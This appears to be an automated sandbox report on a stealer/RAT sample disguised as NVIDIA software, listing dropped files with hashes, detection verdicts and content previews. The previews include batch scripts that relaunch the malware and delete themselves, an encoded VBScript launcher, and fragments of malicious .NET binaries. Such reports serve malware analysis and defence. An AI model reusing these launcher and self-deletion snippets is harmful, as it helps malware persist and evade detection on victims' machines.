                                                          SHA-512:14EE352A4F7E9D10CA0BB3E635B938CFB7EB21A9E1193A842DF2E909FEB3C2E3BC178D8F8CA542E5D94035B1811AE29D9EA66458C941547EFC31B682EB81A632
                                                          Malicious:false
                                                          Preview:dJayXIi1hO9dpDFFUAOQpGBTy
                                                          Process:C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
                                                          File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):231
                                                          Entropy (8bit):5.196768058769674
                                                          Encrypted:false
                                                          SSDEEP:6:hCijTg3Nou1SV+DE19231JMYKOZG1923fhgJ:HTg9uYDEiLvOJ
                                                          MD5:A904362A2FFB9052FEBCD0203B690607
                                                          SHA1:3B5D16A1640397428D0E5B967FD0E8D28606A8DF
                                                          SHA-256:EF67C22F26BFC4BB4782D57AEB9C8FED3E4AC5293ABDE9B92A784CDAD633E2DF
                                                          SHA-512:2C0CD2BC3E944476762B2D090E33BF65BC958DF74C0DF68E53BDD767E35C745B340FCAF450429A8D4BBBA8A38854C82B5A7FA535E53865A2E8E535C2282A9435
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\s4Al4mMfKa.bat"
                                                          Process:C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
                                                          File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):183
                                                          Entropy (8bit):5.236907318574728
                                                          Encrypted:false
                                                          SSDEEP:3:mKDDVNGvTVLuVFcROr+jn9m1Ukh4E2J5Nn5SP6MYBktKcKZG1Ukh4E2J5xAILHKG:hCRLuVFOOr+DE19231JMYKOZG1923fLx
                                                          MD5:E4B6FA49CF972DC90BD8DFDC493BF985
                                                          SHA1:426B585C4AD92FA611F1024BAD2D0BED2A558803
                                                          SHA-256:4FFDB9A2A2C741AC2D34ABB9B073B67BBEBF0B02FB8FF58A88B23A8044400879
                                                          SHA-512:B21C0B914736BE2BE14039EB77AB6D7290B88EDBD56D799BE85EDFF3F45AF26B8CFA3D5CCB67E1D9FEA81832CAA3C4729E9B67E620DD8D7D21F8B13C18BE5D17
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\sxRqhXCXyo.bat"
                                                          Process:C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe
                                                          File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):231
                                                          Entropy (8bit):5.27952566668794
                                                          Encrypted:false
                                                          SSDEEP:6:hCijTg3Nou1SV+DE19231JMYKOZG1923fLKq:HTg9uYDEiLvjKq
                                                          MD5:1139BA871D102BF5F872DD1D4F38750B
                                                          SHA1:CA0074E893A48FAAFE05AFA3172FD25083644723
                                                          SHA-256:0DD6BF8795EDC35CC9F67291DD8C67C424A5C3443313F86DE2B28CC057FF48A6
                                                          SHA-512:A0A60F52A0354281F05A3502D8B458A91CA49B6BC74102F1F742E43AB399EDF001C68BE4442F599C959F526AE3FD7D92A311F98351451F148BFE107530AB0371
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\vPPPhWVNfR.bat"
                                                          Process:C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):25
                                                          Entropy (8bit):4.323856189774724
                                                          Encrypted:false
                                                          SSDEEP:3:sRLzmrKLIntn:stzm+Lq
                                                          MD5:9310B8A9FADB1D759809D1E97B3068CB
                                                          SHA1:8A0D8347F69785BD12F080F6784E1E3D893D1AEF
                                                          SHA-256:611ACC57A02128AA230671E0F31D69FA1CB6D1062933A6BEFE4761F36B1AA980
                                                          SHA-512:54D61FDBE6A6E573BD08EA8064647ED2B7C89B2F323C0A43228418C1A1663338247BA7FB25DA6E922A3FB52A30B1852B36782D12BD131630B9E52D737F3D79DD
                                                          Malicious:false
                                                          Preview:y84nBVfSxEam1ReItwcymBgcr
                                                          Process:C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):25
                                                          Entropy (8bit):4.5638561897747225
                                                          Encrypted:false
                                                          SSDEEP:3:uWQ18RR1o:uWQARS
                                                          MD5:18192D13C309A2670A3182A265A51E3A
                                                          SHA1:79BCDC3C4F54B8A7D1DC2CB0A874941EEBAEC67B
                                                          SHA-256:4DCCA76400E7F1C3CFB0A82624A56FF5D1A6510B448E0A512CCF1756772B5E6F
                                                          SHA-512:3A3C1E65328C47A0ABDB0F26C1B7B4412893435AEA304E99DFB1A921507244CC3C01A59EADF2F09BD03636A58270D2B90A074FD1BF3C29EB7BDB503BDF908370
                                                          Malicious:false
                                                          Preview:9zsgvPHmApkE14xZH8lK3cLaI
                                                          Process:C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):25
                                                          Entropy (8bit):4.403856189774723
                                                          Encrypted:false
                                                          SSDEEP:3:xuJYpAn:xup
                                                          MD5:2D1C2593805BE88A21141A67E0FF58F1
                                                          SHA1:31DDFA8C64DA0CE8A36C937DF0D4844B872E5839
                                                          SHA-256:AF3B92636460D33F10E062621AC8125FFA829B7DBB4B02DD9D6C270B795FB837
                                                          SHA-512:58C67A78322BB44F5259F424DAE29AF79CC6DB9E274BE5336F251FF4B2206ECCD8D6E2283F5F88EEBBEC58A42C27F8E4EC015042038D6B2167FF8E0E49673927
                                                          Malicious:false
                                                          Preview:wJeNdb9tJIDX54Mns7SXGSCa6
                                                          Process:C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe
                                                          File Type:ASCII text, with very long lines (382), with no line terminators
                                                          Category:dropped
                                                          Size (bytes):382
                                                          Entropy (8bit):5.825482493189938
                                                          Encrypted:false
                                                          SSDEEP:6:iOg1dTqa306R+gBmekzQ0UINdYyhKOEqRkXUOWdYP5yPzTTH2y9Xa3TgoJFrW74n:asa3VRBBmv81INaqR856HCTtJN9n
                                                          MD5:0C25AAF326F7A6944FDB31A48CDD6918
                                                          SHA1:FF0A3D077B5B0D949B9AE1FB6908678259D48958
                                                          SHA-256:6C54C8A8369FD732D78FB60D0FBF088495D6D6CBECBA6826D1C101A422B819DB
                                                          SHA-512:03E1ED6BF5A3CD757E590CF699E971F4EB84413F1257673EAE9C3BC2BEA34D4E23BA578CBC68E19526A863F999B560E96F982444992C1FBC80AED1B5A88A4AC2
                                                          Malicious:false
                                                          Preview:rKxS4NInpJOzWiEaLMMMEa8pJ6JJuJEj7wtOcRLEbieogrRRF6Xlr3SQLHJ7D83fEp1kzz83BIug6UJbp2Exvd1EdcCVHNAdp8j1zrcP8dkjJwU17rSL4FulxxGXxmvxHQ07uSm8ayzR2S5qHLYa5yjkO7DCkEcVrwb26WGoFUvFPcte2ZPlOV2TrQtxOkXVWejG1CuvEtVkDeUvOjKLz0GW3ILpmTZf7asu2nnzodhfARPN68ipaLffYNMs1FIvT0nmvj2l6UgVTkVm27touuEv4MWpa48iVvLKonbWF7tFoJMx1k03WdBjv2riNMKBV7AhYL7PfWiwA9GuAix0EEM1umZv53I3xsuqJoYqmlX95Oiwv6ioZT7QvIxwwL
                                                          Process:C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):1937408
                                                          Entropy (8bit):7.542448246853066
                                                          Encrypted:false
                                                          SSDEEP:49152:Uul0wFSe3LBPCLPN7KNt6joVQj8Axv02AcY7e:Ui07e7BPClKNt6joVQj3R+e
                                                          MD5:833E95D4CE4E4A4AD42322F75AE6FF57
                                                          SHA1:C212B00EA68564CA96AD90BFBB32BC869BE6860F
                                                          SHA-256:2C7C5C61FC1E5BDACFF2B81F8FDA8514924F1820FD090F35D7506C3778173C9E
                                                          SHA-512:BAF397A9EEDCAFBDB74777EEDAF637785C020B2EB99C20254A27E44EAD1DDE18B787C78906F3473D5347C7B0C83BB7B41CF0DBBE3C9CDE2CBBC9A6FC7267E766
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe, Author: Joe Security
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe, Author: Joe Security
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 66%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e................................. ........@.. ....................................@.................................`...K.......p............................................................................ ............... ..H............text........ ...................... ..`.rsrc...p...........................@....reloc..............................@..B........................H..................g..................................................0..........(.... ........8........E....q.......)...M...8l...(.... ....~....{....:....& ....8....(.... ....~....{o...:....& ....8....(.... ....~....{....:....& ....8z...*...0.......... ........8........E........h...%.......J...Y.......8....~....9.... ....8....r...ps....z*...... ....~....{....:....& ....8....8.... ....8....8.... ....8w...~....([... .... .... ....s....~....(_....... ....~....{d...:7...& ...
                                                          Process:C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):1937408
                                                          Entropy (8bit):7.542448246853066
                                                          Encrypted:false
                                                          SSDEEP:49152:Uul0wFSe3LBPCLPN7KNt6joVQj8Axv02AcY7e:Ui07e7BPClKNt6joVQj3R+e
                                                          MD5:833E95D4CE4E4A4AD42322F75AE6FF57
                                                          SHA1:C212B00EA68564CA96AD90BFBB32BC869BE6860F
                                                          SHA-256:2C7C5C61FC1E5BDACFF2B81F8FDA8514924F1820FD090F35D7506C3778173C9E
                                                          SHA-512:BAF397A9EEDCAFBDB74777EEDAF637785C020B2EB99C20254A27E44EAD1DDE18B787C78906F3473D5347C7B0C83BB7B41CF0DBBE3C9CDE2CBBC9A6FC7267E766
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe, Author: Joe Security
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe, Author: Joe Security
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 66%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e................................. ........@.. ....................................@.................................`...K.......p............................................................................ ............... ..H............text........ ...................... ..`.rsrc...p...........................@....reloc..............................@..B........................H..................g..................................................0..........(.... ........8........E....q.......)...M...8l...(.... ....~....{....:....& ....8....(.... ....~....{o...:....& ....8....(.... ....~....{....:....& ....8z...*...0.......... ........8........E........h...%.......J...Y.......8....~....9.... ....8....r...ps....z*...... ....~....{....:....& ....8....8.... ....8....8.... ....8w...~....([... .... .... ....s....~....(_....... ....~....{d...:7...& ...
                                                          Process:C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):87
                                                          Entropy (8bit):5.040492134143617
                                                          Encrypted:false
                                                          SSDEEP:3:wGnjemBS2v1mnSVnV7hsQTAX0dI/DHAn:wGimg1nSNV7RdJn
                                                          MD5:5EF72274BAA31B738A60E29492230464
                                                          SHA1:CA7ED6A83325F6A117F5202E75F247230D5B3E5C
                                                          SHA-256:7C42054D40B7C9C7023F90CE8407E3607BCC4B4DE9AFD260B8F497C6D9B3DE84
                                                          SHA-512:9688BD293B912B625D61BB8F63B1A2F5FC1BA529B06E8536CB4CF77BECC4CD0D855C587BAA22275FCD0D49995A5DA36134C2CCB39A8F8435429E1885C8C21DF8
                                                          Malicious:false
                                                          Preview:%pcrRrVCLlyfKguc%%JUjNGITVTBI%..%uCBdj%"%AppData%\NVIDIA/NVIDIA Container.exe"%QoAcqhp%
                                                          Process:C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):200
                                                          Entropy (8bit):5.716884002715895
                                                          Encrypted:false
                                                          SSDEEP:6:GtkgwqK+NkLzWbHZEG8nZNDd3RL1wQJRZ7tZwAZQM:Gt2MCzWL6G4d3XBJr7nwIQM
                                                          MD5:008EB899F204BEEFDAD0E3DD3D35E1FB
                                                          SHA1:53BEC4EB9E3F2736419CA1384E137382498FB6E0
                                                          SHA-256:DD0FB32578088488F558149719EC269D1F09DE6407EBE4D252A185ACAC0820E5
                                                          SHA-512:E17D02C8C3C6F9068E6CC49F7E4EEA5F769859DE81F5B4172085228FB683B5D6499F2CB196BF069B75E3965B4776F86D8FCC4338B8E1804ECEE40BA093304770
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          Preview:#@~^rwAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2v&T!Zb@#@&j.Y,./4?4nV^PxP;DnCD+r(%+1Y`r.jmMkaY ?4n^VE#@#@&.ktj4.VV ]!x~Ju)aw9mYm]zg.&9qzz&I(hpPTZ6! 4mYJB~T~,0mVd+WjYAAA==^#~@.
                                                          Process:C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):33792
                                                          Entropy (8bit):5.541771649974822
                                                          Encrypted:false
                                                          SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                          MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                          SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                          SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                          SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 38%
                                                          Joe Sandbox View:
                                                          • Filename: GameHackBuild1.exe.bin.exe, Detection: malicious, Browse
                                                          • Filename: XenoSetup(2).exe.bin.exe, Detection: malicious, Browse
                                                          • Filename: SAMP_CHEAT_ATVECHAU2.exe.bin.exe, Detection: malicious, Browse
                                                          • Filename: SPISOK_DENEG.exe, Detection: malicious, Browse
                                                          • Filename: ElixirInjector.exe, Detection: malicious, Browse
                                                          • Filename: DCobxod.exe, Detection: malicious, Browse
                                                          • Filename: fatality.exe, Detection: malicious, Browse
                                                          • Filename: NursultanAlphaCrack.bat.exe, Detection: malicious, Browse
                                                          • Filename: SearchIndexer.exe, Detection: malicious, Browse
                                                          • Filename: fatality.exe, Detection: malicious, Browse
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                          Process:C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):85504
                                                          Entropy (8bit):5.8769270258874755
                                                          Encrypted:false
                                                          SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                          MD5:E9CE850DB4350471A62CC24ACB83E859
                                                          SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                          SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                          SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 71%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k
                                                          Process:C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):33792
                                                          Entropy (8bit):5.541771649974822
                                                          Encrypted:false
                                                          SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                          MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                          SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                          SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                          SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 38%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                          Process:C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):33792
                                                          Entropy (8bit):5.541771649974822
                                                          Encrypted:false
                                                          SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                          MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                          SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                          SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                          SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 38%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                          Process:C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):69632
                                                          Entropy (8bit):5.932541123129161
                                                          Encrypted:false
                                                          SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                          MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                          SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                          SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                          SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 50%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.
                                                          Process:C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):69632
                                                          Entropy (8bit):5.932541123129161
                                                          Encrypted:false
                                                          SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                          MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                          SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                          SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                          SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 50%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.
                                                          Process:C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):33792
                                                          Entropy (8bit):5.541771649974822
                                                          Encrypted:false
                                                          SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                          MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                          SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                          SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                          SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 38%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                          Process:C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):85504
                                                          Entropy (8bit):5.8769270258874755
                                                          Encrypted:false
                                                          SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                          MD5:E9CE850DB4350471A62CC24ACB83E859
                                                          SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                          SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                          SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 71%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k
                                                          Process:C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):32256
                                                          Entropy (8bit):5.631194486392901
                                                          Encrypted:false
                                                          SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                          MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                          SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                          SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                          SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 25%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                          Process:C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):32256
                                                          Entropy (8bit):5.631194486392901
                                                          Encrypted:false
